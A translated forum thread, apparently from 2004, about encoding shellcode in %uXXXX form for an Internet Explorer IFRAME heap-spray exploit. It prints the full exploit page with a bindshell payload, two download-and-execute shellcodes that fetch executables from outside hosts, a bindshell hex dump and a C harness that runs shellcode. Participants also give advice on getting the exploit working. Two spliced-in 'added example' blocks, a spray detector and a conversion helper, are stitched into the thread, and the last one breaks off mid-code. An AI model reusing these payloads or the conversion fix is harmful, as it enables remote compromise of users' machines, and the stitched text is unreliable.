[ Krajisnik @ 29.11.2004. 16:23 ] @
A while ago now a POC exploit for Internet Explorer appeared... And inside it the guy "built in" unicoded shellcode, or it has something to do with UTF-8.. No idea, I've read so much and still haven't managed to work out how to convert standard hex shellcode into this format from the exploit.. There's also an explanation in Phrack 62 that concerns this, but I didn't quite understand whether that's what I need..
This is the exploit:
Code:

<HTML>
  <SCRIPT language="javascript">
    // Win32 MSIE exploit helper script, creates a lot of nopslides to land in
    // and/or use as return address. Thanks to blazde for feedback and idears.

    // Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
    // others for inspiration and borrowed code.
    shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
    // Nopslide will contain these bytes:
    bigblock = unescape("%u0D0D%u0D0D");
    // Heap blocks in IE have 20 dwords as header
    headersize = 20;
    // This is all very 1337 code to create a nopslide that will fit exactly
    // between the the header and the shellcode in the heap blocks we want.
    // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
    // documentation for this.
    slackspace = headersize+shellcode.length
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    // And now we can create the heap blocks, we'll create 700 of them to spray
    // enough memory to be sure enough that we've got one at 0x0D0D0D0D
    memory = new Array();
    for (i=0;i<700;i++) memory[i] = block + shellcode;
  </SCRIPT>
  <!--
    The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04                      68 847B7071     PUSH    71707B84
    7178EC09                      50              PUSH    EAX
    7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
    Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
    We land inside one of the nopslides and slide on down to the shellcode.
  -->
  <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC഍഍"></IFRAME>
</HTML>

So, I'm asking for help: can someone tell me how to convert this shellcode of mine into that %uXXXX format... A small C program would be welcome too..
Code:

unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
 "http://reversedhell.net/hackyou.exe"
 "\x08\x01"; // download + exec from the net ;
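As an added example, not part of the thread or of the POC author's code, here is a small heuristic scanner of the kind an analyst might run over a captured page to flag the heap-spray structure used above: an `unescape("%u...")` literal that is one repeated 16-bit value (the slide), a second long literal with high variety (the payload), and a loop that fills an array with hundreds of copies. The sample page is constructed (its first eight payload tokens are copied from the POC above), and the function names and thresholds are my own choices.

```javascript
// Constructed sample page, modelled on the structure of the POC above.
// Only the first few tokens of the payload literal are reproduced.
const SAMPLE_PAGE = `
<SCRIPT language="javascript">
  shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178");
  bigblock = unescape("%u0D0D%u0D0D");
  memory = new Array();
  for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>`;

// Pull every unescape("...") / unescape('...') string literal out of the page.
function extractUnescapeLiterals(src) {
  const re = /unescape\(\s*(["'])((?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}|[^"'])*)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

// Per-literal statistics: how many %uXXXX tokens it holds and what share of
// them is the single most frequent token (1.0 means a pure repeat, i.e. a slide).
function tokenStats(literal) {
  const tokens = literal.match(/%u[0-9a-fA-F]{4}/g) || [];
  const counts = new Map();
  for (const t of tokens) {
    const k = t.toLowerCase();
    counts.set(k, (counts.get(k) || 0) + 1);
  }
  let top = null, topCount = 0;
  for (const [k, c] of counts) if (c > topCount) { top = k; topCount = c; }
  return { tokens: tokens.length, top, topShare: tokens.length ? topCount / tokens.length : 0 };
}

// Largest constant bound of a "for (i=0; i<N; ...) arr[i] = ..." loop,
// i.e. the number of copies the page tries to allocate. 0 if none found.
function sprayLoopBound(src) {
  const re = /for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)\s*\w+\[\w+\]\s*=/g;
  let best = 0, m;
  while ((m = re.exec(src)) !== null) best = Math.max(best, parseInt(m[1], 10));
  return best;
}

// Combine the three signals. The thresholds (90% repeat for a slide, at least
// 8 varied tokens for a payload, 100+ loop iterations) are assumptions picked
// for this example, not values from the thread.
function scanPage(src) {
  const stats = extractUnescapeLiterals(src).map(tokenStats);
  const slide = stats.find(s => s.tokens >= 2 && s.topShare >= 0.9);
  const payload = stats.find(s => s.tokens >= 8 && s.topShare < 0.5);
  const loop = sprayLoopBound(src);
  return {
    slideToken: slide ? slide.top : null,
    payloadTokens: payload ? payload.tokens : 0,
    sprayLoop: loop,
    suspicious: Boolean(slide && payload && loop >= 100),
  };
}

console.log(scanPage(SAMPLE_PAGE));
```

Run with `node scan.js`; on the constructed sample it reports the `%u0d0d` slide, an 8-token payload literal, a 700-iteration spray loop, and `suspicious: true`. A page with no `unescape` literals or no fill loop comes back `suspicious: false`, so the three signals have to agree before anything is flagged.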
[ Vojislav Milunovic @ 29.11.2004. 22:26 ] @
Well, take your shellcode and instead of \x90\x90 etc. just retype it as
%u9090 etc...etc... to the end of the shellcode, exactly like the guy did in this example =) I think that's how it's done, if not correct me =)
[ Krajisnik @ 30.11.2004. 01:38 ] @
That's what I did first, but no luck.. IE just crashes... It seems there are some rules when converting HEX into UTF8 format..
http://www.phrack.org/phrack/62/p62-0x09_UTF8_Shellcode.txt

..if that's the right one...
[ Vojislav Milunovic @ 30.11.2004. 22:10 ] @
Try with that text...
maybe your eip isn't set to the right jmp =)
my recommendation is to fire up a debugger and see whether that's where the catch is
If not, then print out that little text and read it carefully =) so you don't go blind for nothing in front of the monitor =)
[ Krajisnik @ 01.12.2004. 22:33 ] @
No chance.. I've been trying for a week now, but I can't get anywhere when I don't have enough knowledge.. Even if I did hit on the right way to convert it, some small mistake would surely creep in...

C'est la vie...
[ Vojislav Milunovic @ 02.12.2004. 00:10 ] @
Look, you spend 1h reading, 2 testing and the solution just pops out by itself =)
Fire up ollydbg or windbg and follow what gets screwed up in your code...
Trust me, in less than 15min you'll have one of those "A-haa" moments and everything will work 100%... I wrote my shellcode with the help of a debugger, watched the registers to see which ones to save and when, etc... =)

cheers...
[ Krajisnik @ 02.12.2004. 00:56 ] @
I know nothing about debuggers, nor about coding shellcode... That's the only problem.. And starting to learn everything from scratch, you know yourself that's impossible.. At least not before I'm 70.. :)
[ Vojislav Milunovic @ 02.12.2004. 12:03 ] @
If you know C, i386 asm is a piece of cake to learn... maybe it takes you a month, if you really hammer C in the sense that you write algorithms quickly, know how to work well with pointers...
you do all the same things in asm, just in a slightly more complicated way...
Maybe this bind shellcode you posted doesn't work at all and that's why IE crashes... I thought you had written it yourself and so trusted it; as it is, I don't know whether that shellcode works at all =)
cheers =)
[ DownBload @ 02.12.2004. 21:23 ] @

That's plain shellcode encoded in the Unicode standard, meaning that instead of standard ASCII (2^8) you have UNICODE (2^16 = 65,535 possible values), so 2 bytes are needed for one character (%u0178). This %u indicates
that it's unicode.

Regards...
[ Vojislav Milunovic @ 03.12.2004. 00:04 ] @
Yes, that could be deduced from the format of the given exploit alone...
And it's well known that Unicode goes in 2 bytes, at least that's nothing new =)
[ Krajisnik @ 03.12.2004. 18:31 ] @
Is there some program that would convert this HEX into UNICODE format?
[ Vojislav Milunovic @ 03.12.2004. 20:02 ] @
Well, that's done by hand =)
Maybe the shellcode you want to convert has some bug... so that's why IE crashes, maybe you're not hitting the right ret address... who knows... you have to investigate that yourself...
A bit of debugger, a bit of asm, a bit of understanding of the Windows APIs and you have working code in no time =) I can send you my bind shellcode if you want, though there are tons of them on the net... But again you'll have to convert it to hex:

Anyway, here's the whole HEX dump of the shellcode, so if you want to convert it, go ahead:
Code:

E9 60 01 00 00 5D 64 A1 30 00 00 00 8B 40 0C 8B    
70 1C AD 8B 50 08 89 55 00 33 C9 B1 05 8D 75 04    
8D 7D 04 E8 C2 00 00 00 8D 45 30 50 FF 55 08 89    
45 30 33 C9 B1 04 8D 75 18 8B FE 92 E8 A9 00 00    
00 6A 04 68 00 10 00 00 6A 64 51 FF 55 14 89 45    
28 33 D2 8B CA B1 64 88 10 40 E2 FB 52 52 52 52    
42 52 42 52 FF 55 18 89 45 2C 8B 55 28 33 C9 89    
4A 04 66 41 66 41 66 89 0A 66 C7 42 02 15 B3 B1    
10 51 52 50 FF 55 1C 6A 01 8B 45 2C 50 FF 55 20     
33 C0 50 50 8B 45 2C 50 FF 55 24 8B 55 28 83 C2    
10 C7 02 44 00 00 00 89 42 38 89 42 3C 89 42 40    
66 C7 42 30 00 00 C7 42 2C 01 01 00 00 8B 5D 28    
83 C3 55 33 C9 53 52 51 51 51 41 51 49 51 51 8D    
75 37 56 51 FF 55 04 8B 5D 28 83 C3 55 6A FF FF    
33 FF 55 0C 33 C0 50 FF 55 10 55 AD 57 56 51 52    
50 52 E8 0C 00 00 00 83 C4 08 5A 59 5E 5F AB E2    
EA 5D C3 55 8B EC 8B 7D 08 03 7F 3C 8B 7F 78 03    
7D 08 8B 57 20 03 55 08 33 C0 8B 32 03 75 08 E8    
27 00 00 00 3B 4D 0C 74 06 40 83 C2 04 EB EB 8B    
77 24 03 75 08 33 D2 66 8B 14 46 8B 77 1C 03 75    
08 8B 04 96 03 45 08 8B E5 5D C3 50 33 C9 8B D9    
B3 99 33 C0 AC 85 C0 74 0A C1 E0 10 33 C3 03 C8   
4B EB EF 58 C3 E8 9B FE FF FF 41 41 41 41 03 08    
74 05 EA 06 96 04 B0 0A 75 07 5C 06 79 04 EA 06    
D2 04 CD 05 95 03 5E 02 9D 01 87 03 8F 02 87 03    
70 02 41 41 41 41 41 41 41 41 77 73 32 5F 33 32    
00 63 6D 64 20 2F 6B 00     


Just write your own xor algorithm to get around these NULL bytes and you have shellcode
that works 100%, binds cmd.exe /k on port 5555 and that's it...
[ DownBload @ 05.12.2004. 14:08 ] @
Quote:
Krajisnik: Is there some program that would convert this HEX into UNICODE format?


The guy who wrote the exploit for the iframe overflow also wrote some little program that does such
conversions. Google a bit.
[ Krajisnik @ 05.12.2004. 15:29 ] @
I think I've searched 99% of the links on google to find it, but without success.. If you found it, upload it here and I'll take a look..
[ Krajisnik @ 05.12.2004. 18:23 ] @
Eh, just when I thought I had understood everything..
I found another shellcode and tried it.. It works..

Code:

#include <windows.h>
#include <stdio.h>

char shellcode[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!"
"http://www.malware.com/malware.exe"
"\x01";

int main(void)
  {
    int *ret;
    /* Classic shellcode test harness: overwrite main()'s saved return
       address with the address of the buffer, so that returning from
       main() jumps into the shellcode. This relies on a 32-bit x86 build
       with an executable stack and on `ret` sitting directly below the
       saved EBP (hence the +2); it is not portable. */
    ret=(int*)&ret+2;
    (*ret)=(int)shellcode;
    return 0;
  }


Then I converted every \xYY character into %uXXXX format...
Example (so you can see whether I did it right): let's take the first 4 HEX bytes from this shellcode...
\xEB\x0F\x58\x80 == %ueb0f%u5880

assuming I did everything right, I swapped my new unicoded shellcode in for the one in the exploit above, and Internet Explorer crashes...
Where could the mistake be..?
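The post above, DownBload's explanation that each `%uXXXX` token is one two-byte character, and the later "instead of \x90\x34 type %u9034" tip all turn on how a token maps to bytes in memory. As an added example, not code from the thread, the following uses the same built-in `unescape()` the POC relies on and takes the UTF-16LE byte image of the result (Node's `Buffer` stores a string in that encoding exactly as the browser does), so the byte order can be checked rather than assumed. The function names, the 0x90 padding byte and the sample inputs are my choices.

```javascript
// Decode an escape string exactly as unescape() does, then take the UTF-16LE
// byte image of the resulting string: two bytes per code unit, low byte first.
function escapedToBytes(escaped) {
  return Array.from(Buffer.from(unescape(escaped), "utf16le"));
}

// The reverse direction: pack raw bytes into %uXXXX tokens. Each token is one
// 16-bit code unit whose LOW byte is stored first, so the first byte of each
// pair goes into the low half of the token (\xEB\x0F -> %u0feb, not %ueb0f).
// An odd trailing byte is completed with a padding byte (0x90, NOP, by default).
function bytesToEscaped(bytes, pad = 0x90) {
  const b = bytes.slice();
  if (b.length % 2 === 1) b.push(pad);
  let out = "";
  for (let i = 0; i < b.length; i += 2) {
    const unit = b[i] | (b[i + 1] << 8);
    out += "%u" + unit.toString(16).padStart(4, "0");
  }
  return out;
}

// Does encoding and decoding reproduce the original bytes exactly?
// (A padding byte added for odd lengths is ignored.)
function roundTrips(bytes) {
  const decoded = escapedToBytes(bytesToEscaped(bytes));
  return decoded.length >= bytes.length &&
    bytes.every((v, i) => decoded[i] === v);
}

// Constructed inputs: the first four bytes of the C shellcode quoted in the
// post above, and the byte-swapped conversion the post proposes for them.
const FIRST_FOUR = [0xeb, 0x0f, 0x58, 0x80];
const NAIVE = "%ueb0f%u5880";

// Side by side: the naive conversion, the low-byte-first conversion, and the
// first tokens of the POC's own payload (%u43eb%u5756 decodes to EB 43 56 57,
// i.e. the POC already stores its bytes low-byte-first).
function hex(bytes) { return bytes.map(x => x.toString(16).padStart(2, "0")).join(" "); }
console.log("naive  ", NAIVE, "->", hex(escapedToBytes(NAIVE)));
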